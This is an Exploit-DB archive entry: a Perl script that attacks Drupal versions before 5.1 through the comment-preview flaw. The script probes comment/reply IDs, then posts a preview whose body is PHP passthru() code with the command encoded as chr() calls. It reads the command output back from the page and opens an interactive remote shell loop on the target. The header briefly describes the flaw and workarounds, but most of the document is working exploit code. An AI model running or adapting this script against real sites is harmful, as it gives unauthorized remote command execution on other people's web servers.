Drupal < 5.1 - post comments Remote Command Execution Exploit 2

2007-02-15T00:00:00
ID EDB-ID:3312
Type exploitdb
Reporter str0ke
Modified 2007-02-15T00:00:00

Description

Drupal < 5.1 (post comments) Remote Command Execution Exploit v2. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl

#
# $Id: milw0rm_drupalv5.pl,v 0.2 2007/02/15 13:40:29 str0ke Exp $
# 
# milw0rm_drupalv5.pl - Drupal &lt; 5.1 Remote Command Execution Exploit
# Copyright (c) 2007 str0ke &lt;str0ke[!]milw0rm.com&gt;
# 
# Description
# -----------
# Previews on comments were not passed through normal form validation routines,
# enabling users with the 'post comments' permission and access to more than one
# input filter to execute arbitrary code. By default, anonymous and authenticated
# users have access to only one input format.
# Immediate workarounds include: disabling the comment module, revoking the 'post 
# comments' permission for all users or limiting access to one input format.
# Versions affected
# -----------------
# - Drupal 5.x versions before Drupal 5.1
#
# [02/15/2007] The exploit has been fixed. /str0ke
#

use strict;
use LWP::UserAgent;

my $host  = shift || &usage;
my $dir   = shift || "/drupal";
my $proxy = shift;
my $command;

my $conn = LWP::UserAgent-&gt;new();
$conn -&gt; proxy("http", "http://".$proxy."/") unless !$proxy;

sub usage() 
{
	print "[?] Drupal &lt; 5.1 Remote Command Execution Exploit\n";
	print "[?] Copyright (c) 2007 str0ke &lt;str0ke[!]milw0rm.com&gt;\n";
	print "[?] usage: perl $0 [host] [directory] [proxy]\n";
	print "    [host] (ex. www.milw0rm.com)\n";
	print "    [directory] (ex. /drupal)\n";
	print "    [proxy] (ex. 0.0.0.0:8080)\n";
	exit;
}

sub exploit() 
{
	my $i = $_[0];
	my $command = $_[1] || 'ls -l';
	my $cmd     = 'echo start_er;'.$command.';'.'echo end_er';

	my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
	
	my $req = HTTP::Request-&gt;new(POST =&gt; "http://" . $host . $dir . "/?q=comment/reply/" . $i);
	$req -&gt; content_type('application/x-www-form-urlencoded');
	$req -&gt; content('subject=My daddy beats me&comment=&lt;?passthru('.$byte.');?&gt;&format=2&form_id=comment_form&op=Preview comment');

	my $content = $conn-&gt;request($req);
	
	if ($content-&gt;content =~ m/start_er(.*?)end_er/ms) {
		my $out = $1;

		if ($out) {
			print "$out\n";
		} else {
			print "[-] Exploit Failed...\n";
			exit;
		}	
	}	
}

for my $i ( 1 .. 400 ) {
	my $output = $conn -&gt; get("http://" . $host . $dir . "/?q=comment/reply/" . $i);

	if($output -&gt; is_success)
	{
		if($output -&gt; content =~ /add new comment/)
		{
			print "[+] found comment/reply: $i\n";

			&exploit($i);
			
			while()
			{
				print "str0kin-drupal\$ ";
				chomp($command = &lt;STDIN&gt;);
				exit unless $command;
				&exploit($i, $command);
			}
			exit;
		}
	}
}

print "[-] Exploit Failed...\n";

# milw0rm.com [2007-02-15]